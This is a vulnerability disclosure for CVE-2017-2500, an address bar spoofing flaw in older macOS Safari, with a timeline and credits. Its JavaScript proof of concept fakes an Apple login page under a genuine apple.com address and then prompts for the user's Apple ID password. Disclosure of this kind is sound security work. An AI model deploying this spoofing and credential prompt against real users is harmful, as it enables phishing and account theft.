(CVE-2017-2500) Address bar spoofing on macOS Safari

Affected Products

Safari < 10.1.1 on macOS

Description

When we enter a URL that includes an unusual port, or visit a domain that has a DNS record but is no longer reachable (for example "http://www.apple.com:1234" or "http://access.apple.com"), Safari keeps trying to load that address, so the address bar can be spoofed while the load is pending.

Proof of concept

<script>
// Write a fake title and body into the current page, then start a navigation to an
// address Safari will keep trying to load (a closed port, or a domain that resolves
// in DNS but is unreachable). While that load is pending, the address bar shows the
// target URL over the content written here.
function spoof() {
    document.write("<title>Apple login</title><h1>Trust me! This is apple.com!</h1>");
    window.location.assign("http://www.apple.com:1234");
    // or use the following instead:
    // window.location.assign("http://access.apple.com");
}
// Pass the function reference, not its result: spoof() would run once and hand
// setInterval undefined, so the navigation would never be re-triggered.
setInterval(spoof, 2000);
setTimeout(function () {
    prompt('Checking your appid password:');
}, 6000);
</script>

Disclosure Timeline

2017/2/7 Provided vulnerability details to Apple via product-security@apple.com
2017/4/26 Apple fixed the issue in Safari 10.1.1
2017/5/12 CVE-2017-2500 assigned.

Credit

This vulnerability was discovered by Zhiyang Zeng and Yuyang Zhou of Tencent Security Platform Department.